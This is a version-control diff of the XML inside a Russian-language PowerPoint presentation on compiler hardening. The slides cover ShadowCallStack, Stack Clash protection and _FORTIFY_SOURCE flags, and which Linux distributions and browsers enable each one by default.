+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>mshstk</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>ShadowCallStack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=shadow-call-stack</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в дистрибутивах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пакеты </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>дефолтно собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Clash</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Статус на </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>неясен (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>compiler-flags-distro #12</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
+              <a:t>Защита не включена по умолчанию в дистрибутивах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и браузерах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome/Firefox</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>На </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian 12 (stable) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не защищены даже уязвимые программы: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>bash, bzip2, curl, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ffmpeg</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>perl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, python, etc.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует защиту от </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Clash (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>BZ #1852202</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>), </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>а </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>нет</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
@@ -34342,7 +34205,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C614A2F-E5F3-45F9-86A4-52A24EAE633A}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8A2AE2-629B-42FD-9E28-E4A1D19A5BF3}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34369,7 +34232,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2494840990"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1796431697"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -34401,7 +34264,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFADEC6-171D-4ACB-9FCC-86BE492CE91F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34419,11 +34282,11 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>_FORTIFY_SOURCE: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить</a:t>
+              <a:t>Stack Clashing: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как использовать</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -34437,7 +34300,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C3255C-F753-4543-BECB-F71864F2D5F2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34448,277 +34311,235 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="838200" y="1834590"/>
-            <a:ext cx="10515600" cy="4351338"/>
-          </a:xfrm>
-        </p:spPr>
+        <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Для явного включения используются макросы </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
+              <a:t>Включен по умолчанию только в компиляторе </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рекомендуется явно указывать флаг </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=2</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>или </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3</a:t>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-clash-protection</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пока не появится </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
-              </a:rPr>
-              <a:t></a:t>
+              <a:t>Пакеты в Debian</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> Fedora</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ubuntu собираются с этим флагом</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в дистрибутивах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пакеты </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Clash</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Статус на </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>неясен (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>compiler-flags-distro #12</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включена по умолчанию в компиляторе </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu GCC (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-D_FORTIFY_SOURCE=3</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не включена в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> не включена по умолчанию нигде</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>пакеты дефолтно собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=2</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>пакеты дефолтно собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>с 2023</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>На </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian 12 (stable) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не защищены даже уязвимые программы: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>bash, bzip2, curl, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>ffmpeg</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>perl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, python, etc.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует защиту от </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Clash (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>BZ #1852202</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>), </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>а </a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>Chrome </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-D_FORTIFY_SOURCE=2</a:t>
-            </a:r>
+              <a:t>нет</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -34727,7 +34548,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2953379-E1A6-429C-9D89-03490548E8EF}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C614A2F-E5F3-45F9-86A4-52A24EAE633A}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34754,7 +34575,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1952923550"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2494840990"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -34786,7 +34607,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88930F68-01D6-4DFC-8C4B-096056195DAD}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFADEC6-171D-4ACB-9FCC-86BE492CE91F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34804,7 +34625,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>STL hardening: </a:t>
+              <a:t>_FORTIFY_SOURCE: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -34822,7 +34643,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDEFA53E-F74E-4729-8A65-412D2CAD0540}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C3255C-F753-4543-BECB-F71864F2D5F2}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34833,7 +34654,12 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="838200" y="1834590"/>
+            <a:ext cx="10515600" cy="4351338"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr>
             <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
@@ -34841,35 +34667,108 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Libstdc++:</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>D_GLIBCXX_ASSERTIONS</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Для явного включения используются макросы </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=2</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>(дефолтная </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>STL </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC </a:t>
+              <a:t>Пока не появится </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
